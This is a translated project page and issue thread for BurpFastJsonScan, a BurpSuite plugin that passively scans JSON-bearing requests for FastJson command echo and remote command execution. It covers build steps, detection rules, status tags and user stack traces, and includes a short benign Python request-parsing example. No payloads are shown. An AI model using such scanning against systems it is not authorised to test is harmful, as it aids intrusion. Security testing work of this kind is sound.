
burpfastjsonscan's Introduction

BurpFastJsonScan

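A passive FastJson detection plugin for BurpSuite

Disclaimer

This tool is for security self-assessment only.

The user alone is responsible for any direct or indirect consequences and losses caused by spreading or using the information provided by this tool; the author accepts no liability.

I reserve the right to modify and interpret this tool. Without permission from the network security authorities and other relevant departments, this tool must not be used for any attack activity, and must not be used for commercial purposes in any way.

Introduction

BurpFastJsonScan is a scanning plugin meant to save some penetration-testing time so you can slack off a little.

The plugin checks requests passed in from BurpSuite that carry JSON data.

Current features:

  • Command echo
  • Remote command execution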

Please note!

Compiled with JDK 1.8 by default.

In the latest Burp 2.x the JDK is 1x, which makes the plugin unusable. Please download the source and compile it yourself with the JDK 1x on your own machine. Thanks.

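Build

This is a Java Maven project.

The default Java version is 1.8.

Import the source you just downloaded into IDEA.

Open /BurpFastJsonScan/pom.xml and install the required packages. The first dependency install takes quite a while, so be patient.

Build output directory: /BurpFastJsonScan/target/BurpFastJsonScan/

JAR location: /BurpFastJsonScan/target/BurpFastJsonScan/BurpFastJsonScan.jar

Project configuration file: /BurpFastJsonScan/target/BurpFastJsonScan/resources/config.yml

Then take this JAR and import it into BurpSuite.

Installation

This is a Java Maven project.

If you want to build it yourself, download the source, compile it into a JAR, and import that into BurpSuite.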

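Detection methods

There are currently two detection methods:

  • Command echo
  • Remote command execution

Detection rules

  • The POST content is JSON
  • A GET parameter value is JSON
  • A POST parameter value is JSON
  • A Cookie parameter value is JSON

Example:
GET, POST, or Cookie has a parameter named json
json = {"aaa":"66666"}
Then it will be checked.
A request whose content is directly JSON, with no parameter name, will also be checked.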
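
The four rules above determine which requests are examined. As an added illustration (not the plugin's own code, which is Java), the following Python function applies the same rules to a raw HTTP request and reports where JSON reaches the server, which is also a quick way to inventory JSON-bearing inputs in captured traffic. The function names and the sample requests are constructed for this example, and a well-formed request line is assumed.

```python
import json
from urllib.parse import parse_qsl, unquote, urlsplit


def is_json_container(text):
    """True when text parses as a JSON object or array (bare scalars are ignored)."""
    text = text.strip()
    if not text or text[0] not in "{[":
        return False
    try:
        return isinstance(json.loads(text), (dict, list))
    except ValueError:
        return False


def find_json_locations(raw_request):
    """Return sorted (location, name) pairs for every place the request carries JSON.

    location is "body", "get", "post" or "cookie"; name is the parameter name,
    or "" when the whole POST body is JSON.
    """
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    hits = set()

    # Rule: a GET (query-string) parameter whose value is JSON.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if is_json_container(value):
            hits.add(("get", name))

    # Rule: a Cookie parameter whose value is JSON (usually percent-encoded).
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.partition("=")
        if sep and is_json_container(unquote(value)):
            hits.add(("cookie", name.strip()))

    if method.upper() == "POST" and body.strip():
        if is_json_container(body):
            # Rule: the POST content itself is JSON, with no parameter name.
            hits.add(("body", ""))
        else:
            # Rule: a form-encoded POST parameter whose value is JSON.
            for name, value in parse_qsl(body.strip(), keep_blank_values=True):
                if is_json_container(value):
                    hits.add(("post", name))

    return sorted(hits)


# Constructed sample requests (not captured traffic).
SAMPLE_GET = (
    "GET /api/item?json=%7B%22aaa%22%3A%2266666%22%7D&page=2 HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: sid=abc123; prefs=%7B%22theme%22%3A%22dark%22%7D\r\n"
    "\r\n"
)
SAMPLE_JSON_BODY = (
    "POST /api/login HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"aaa":"66666"}'
)
SAMPLE_FORM = (
    "POST /save HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "name=bob&json=%7B%22aaa%22%3A%2266666%22%7D"
)
SAMPLE_PLAIN = "GET /index.html?id=5 HTTP/1.1\r\nHost: app.example\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_GET, SAMPLE_JSON_BODY, SAMPLE_FORM, SAMPLE_PLAIN):
        print(sample.split("\r\n", 1)[0], "->", find_json_locations(sample))
```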

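Usage

Browse the website as usual. If one of the site's requests contains JSON, the plugin will try to check it.

Once the request completes, the plugin scans automatically.

If there are results, the plugin shows them in the following places:

  • Tag
  • Extender
  • Scanner-Issue activity

Viewing issues

They can currently be viewed in these places:

Viewing vulnerability status in the Tag tab

The vulnerability status can now be viewed in the Tag tab.

The following values may be returned:
- request no json = the request contains no JSON
- request json no eligible = the JSON in the request does not meet the conditions
- the number of website problems has exceeded = the number of issues for the website has been exceeded
- the number of website scans exceeded = the number of scans allowed for the website has been exceeded
- waiting for test results = waiting for test results
- [+] found fastJson command execution = fastJson command execution found
- [-] not found fastJson command execution = fastJson command execution not found
- [x] scan task timed out = the scan task timed out
- [x] unknown error = unknown error

When an unknown error occurs, you can try viewing the error details below.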

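Troubleshooting

What if a scan went wrong and you want to scan again?

For example, the tag keeps showing the following:

  • the number of website problems has exceeded = the number of issues for the website has been exceeded
  • the number of website scans exceeded = the number of scans allowed for the website has been exceeded

Solution:

How to switch the dnslog provider

After building, go into the BurpFastJsonScan folder, enter the resources directory, and open config.yml

As follows:

To switch to DnsLogCn/BurpDnsLog, just replace the value of provider with the corresponding name.

To use Ceye, do the following:

Obtain the token and Identifier

Then open config.yml, fill it in as shown below, and reinstall the plugin: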

burpfastjsonscan's People

Contributors

pmiaowu


burpfastjsonscan's Issues

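The plugin throws an exception; sorry to trouble you, miaowu, 3Q~~~

The latest few versions throw this exception whether I build them myself or download them directly. I tested with BurpSuite 2022.3.7/2022.3.8 and 2020.8.1 and all of them have this problem [local JDK: java version "11.0.15.1"]. Please take a look~~~~ arigato~~~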
========插件错误-未知错误============
java.lang.reflect.InvocationTargetException
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
at burp.DnsLogModule.DnsLog.<init>(DnsLog.java:19)
at burp.BurpExtender.remoteCmdExtension(BurpExtender.java:314)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:181)
at burp.adf.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: com.github.kevinsawicki.http.HttpRequest$HttpRequestException: java.net.SocketTimeoutException: Read timed out
at com.github.kevinsawicki.http.HttpRequest.code(HttpRequest.java:1562)
at burp.DnsLogModule.ExtensionMethod.DnsLogCn.init(DnsLogCn.java:41)
at burp.DnsLogModule.ExtensionMethod.DnsLogCn.<init>(DnsLogCn.java:25)
... 13 more
Caused by: java.net.SocketTimeoutException: Read timed out
at java.base/java.net.SocketInputStream.socketRead0(Native Method)
at java.base/java.net.SocketInputStream.socketRead(SocketInputStream.java:115)
at java.base/java.net.SocketInputStream.read(SocketInputStream.java:168)
at java.base/java.net.SocketInputStream.read(SocketInputStream.java:140)
at java.base/java.io.BufferedInputStream.fill(BufferedInputStream.java:252)
at java.base/java.io.BufferedInputStream.read1(BufferedInputStream.java:292)
at java.base/java.io.BufferedInputStream.read(BufferedInputStream.java:351)
at java.base/sun.net.www.http.HttpClient.parseHTTPHeader(HttpClient.java:746)
at java.base/sun.net.www.http.HttpClient.parseHTTP(HttpClient.java:689)
at java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1615)
at java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1520)
at java.base/java.net.HttpURLConnection.getResponseCode(HttpURLConnection.java:527)
at com.github.kevinsawicki.http.HttpRequest.code(HttpRequest.java:1560)
... 15 more

How do I resolve this error?

========插件错误-未知错误============
java.lang.reflect.InvocationTargetException
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
at java.lang.reflect.Constructor.newInstance(Unknown Source)
at burp.Application.CmdEchoExtension.CmdEcho.init(CmdEcho.java:56)
at burp.Application.CmdEchoExtension.CmdEcho.<init>(CmdEcho.java:35)
at burp.BurpExtender.cmdEchoExtension(BurpExtender.java:274)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:174)
at burp.f5p.run(Unknown Source)
at java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source)
at java.util.concurrent.FutureTask.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Caused by: java.lang.NullPointerException: Response cannot be null
at burp.c6r.analyzeResponse(Unknown Source)
at burp.e3m.analyzeResponse(Unknown Source)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.cmdEchoDetection(CmdEchoScan.java:96)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.runExtension(CmdEchoScan.java:73)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.<init>(CmdEchoScan.java:55)
... 14 more
java.lang.NullPointerException: Response cannot be null
at burp.c6r.analyzeResponse(Unknown Source)
at burp.e3m.analyzeResponse(Unknown Source)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.cmdEchoDetection(CmdEchoScan.java:96)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.runExtension(CmdEchoScan.java:73)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.<init>(CmdEchoScan.java:55)
at sun.reflect.GeneratedConstructorAccessor61.newInstance(Unknown Source)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
at java.lang.reflect.Constructor.newInstance(Unknown Source)
at burp.Application.CmdEchoExtension.CmdEcho.init(CmdEcho.java:56)
at burp.Application.CmdEchoExtension.CmdEcho.<init>(CmdEcho.java:35)
at burp.BurpExtender.cmdEchoExtension(BurpExtender.java:274)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:174)
at burp.f5p.run(Unknown Source)
at java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source)
at java.util.concurrent.FutureTask.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)

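JDK 11 reports a successful load but still throws a pile of errors; will this affect scanning?

JDK 11 reports that the plugin loaded successfully, but it still throws a pile of errors. Will this affect scanning? In the same environment, the colleague next to me can get detections, but mine can't......
I don't know where the problem is.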

java.lang.NullPointerException
	at burp.aii.T(Unknown Source)
	at burp.cnn.getHttpService(Unknown Source)
	at burp.gvg.getHttpService(Unknown Source)
	at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
	at burp.bpc.a(Unknown Source)
	at burp.fno.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.jf.a(Unknown Source)
	at burp.guy.a(Unknown Source)
	at burp.dc4.b(Unknown Source)
	at burp.jf.addNotify(Unknown Source)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addImpl(Container.java:1146)
	at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
	at burp.cd6.a(Unknown Source)
	at burp.cd6.insertTab(Unknown Source)
	at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
	at burp.bxg.a(Unknown Source)
	at burp.guy.c(Unknown Source)
	at burp.guy.lambda$extensionConfigChanged$5(Unknown Source)
	at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
	at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
	at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
	at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
	at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

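Error after loading with 1.8 + version 2020.2.1

Hello, sorry to bother you. I had been using JDK 14 to load the new version of Burp and kept running into problems. Today I tried running Burp 2020.2.1 with Java 1.8.0 and then downloaded the 1.8 build of the plugin from the releases, but it still reports an error after loading. I'm not very familiar with Java, so I don't know what went wrong.
The error output is below: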
java.lang.NullPointerException
at burp.ab1.a(Unknown Source)
at burp.en6.getHttpService(Unknown Source)
at burp.fcp.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.dbg.b(Unknown Source)
at burp.exj.b(Unknown Source)
at burp.exj.a(Unknown Source)
at burp.ax_.b(Unknown Source)
at burp.bht.a(Unknown Source)
at burp.exj.addNotify(Unknown Source)
at java.awt.Container.addNotify(Container.java:2776)
at javax.swing.JComponent.addNotify(JComponent.java:4740)
at java.awt.Container.addNotify(Container.java:2776)
at javax.swing.JComponent.addNotify(JComponent.java:4740)
at java.awt.Container.addNotify(Container.java:2776)
at javax.swing.JComponent.addNotify(JComponent.java:4740)
at java.awt.Container.addNotify(Container.java:2776)
at javax.swing.JComponent.addNotify(JComponent.java:4740)
at java.awt.Container.addNotify(Container.java:2776)
at javax.swing.JComponent.addNotify(JComponent.java:4740)
at java.awt.Container.addImpl(Container.java:1124)
at javax.swing.JTabbedPane.insertTab(JTabbedPane.java:724)
at burp.exs.a(Unknown Source)
at burp.exs.insertTab(Unknown Source)
at javax.swing.JTabbedPane.addTab(JTabbedPane.java:798)
at burp.dje.a(Unknown Source)
at burp.ax_.a(Unknown Source)
at burp.ax_.lambda$extensionConfigChanged$4(Unknown Source)
at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:311)
at java.awt.EventQueue.dispatchEventImpl(EventQueue.java:758)
at java.awt.EventQueue.access$500(EventQueue.java:97)
at java.awt.EventQueue$3.run(EventQueue.java:709)
at java.awt.EventQueue$3.run(EventQueue.java:703)
at java.security.AccessController.doPrivileged(Native Method)
at java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:74)
at java.awt.EventQueue.dispatchEvent(EventQueue.java:728)
at java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:205)
at java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:116)
at java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:105)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:93)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:82)

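Hi, a feature request

I've been using your three plugins (fastjson, shiro, and log4j). Because they scan passively, they passively scan every request that goes through Burp. When testing a website, one usually adds the target site to the scope. Could these three plugins get a configuration option to test only what is in scope? For reference:

Feature request

Could you add a sorting feature so that the newest scan tasks are shown at the top of the scan list?

Request to add a feature

Hello, I tried using the fastjson tool you provide. During testing I found that the tool has no right-click option to resend a request. In some special scenarios, for example when the content-type has to be changed to json by hand, this can be a bit inconvenient. Would it be possible to add this feature?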

at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716) error

at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.cus.W(Unknown Source)
at burp.g4d.getHttpService(Unknown Source)
at burp.g1f.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.ace.a(Unknown Source)
at burp.h1j.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.fdg.a(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.c8l.b(Unknown Source)
at burp.fdg.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addImpl(Container.java:1150)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:756)
at burp.r3.a(Unknown Source)
at burp.r3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:830)
at burp.dn1.a(Unknown Source)
at burp.b9n.c(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.g9b.a(Unknown Source)
at burp.a2e.addSuiteTab(Unknown Source)
at burp.bav.addSuiteTab(Unknown Source)
at burp.i0_.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:771)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:722)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.cus.W(Unknown Source)
at burp.g4d.getHttpService(Unknown Source)
at burp.g1f.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.ace.a(Unknown Source)
at burp.h1j.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.fdg.a(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.c8l.b(Unknown Source)
at burp.fdg.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addImpl(Container.java:1150)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:756)
at burp.r3.a(Unknown Source)
at burp.r3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:830)
at burp.dn1.a(Unknown Source)
at burp.b9n.c(Unknown Source)
at burp.b9n.lambda$extensionConfigChanged$5(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:771)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:722)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

BUG?

The latest version, 2020.12.1, doesn't seem to be supported.

How do I fix java.lang.NullPointerException....

java.lang.NullPointerException
at burp.eyw.ao(Unknown Source)
at burp.atf.getHttpService(Unknown Source)
at burp.hek.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.eh9.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.h0v.b(Unknown Source)
at burp.cpv.a(Unknown Source)
at burp.feh.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addImpl(Container.java:1142)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
at burp.fe3.a(Unknown Source)
at burp.fe3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
at burp.es1.a(Unknown Source)
at burp.h0v.c(Unknown Source)
at burp.h0v.a(Unknown Source)
at burp.ep_.a(Unknown Source)
at burp.cnz.addSuiteTab(Unknown Source)
at burp.b8p.addSuiteTab(Unknown Source)
at burp.fms.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:764)
at java.desktop/java.awt.EventQueue.access$500(EventQueue.java:97)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:717)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:711)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:89)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:734)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:199)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException
at burp.eyw.ao(Unknown Source)
at burp.atf.getHttpService(Unknown Source)
at burp.hek.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.eh9.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.feh.a(Unknown Source)
at burp.h0v.b(Unknown Source)
at burp.cpv.a(Unknown Source)
at burp.feh.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addNotify(Container.java:2796)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4784)
at java.desktop/java.awt.Container.addImpl(Container.java:1142)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
at burp.fe3.a(Unknown Source)
at burp.fe3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
at burp.es1.a(Unknown Source)
at burp.h0v.c(Unknown Source)
at burp.h0v.a(Unknown Source)
at burp.ep_.a(Unknown Source)
at burp.cnz.addSuiteTab(Unknown Source)
at burp.b8p.addSuiteTab(Unknown Source)
at burp.fms.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:764)
at java.desktop/java.awt.EventQueue.access$500(EventQueue.java:97)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:717)
at java.desktop/java.awt.EventQueue$3.run(EventQueue.java:711)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:89)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:734)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:199)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

Error

java.lang.NullPointerException
at burp.h9h.a(Unknown Source)
at burp.e3b.getHttpService(Unknown Source)
at burp.g65.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.gcc.a(Unknown Source)
at burp.dwz.a(Unknown Source)
at burp.dwz.a(Unknown Source)
at burp.co7.b(Unknown Source)
at burp.efw.a(Unknown Source)
at burp.dwz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/java.awt.Container.add(Container.java:997)
at burp.dw7.h(Unknown Source)
at burp.dw7.a(Unknown Source)
at burp.dw7.a(Unknown Source)
at burp.dw7.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
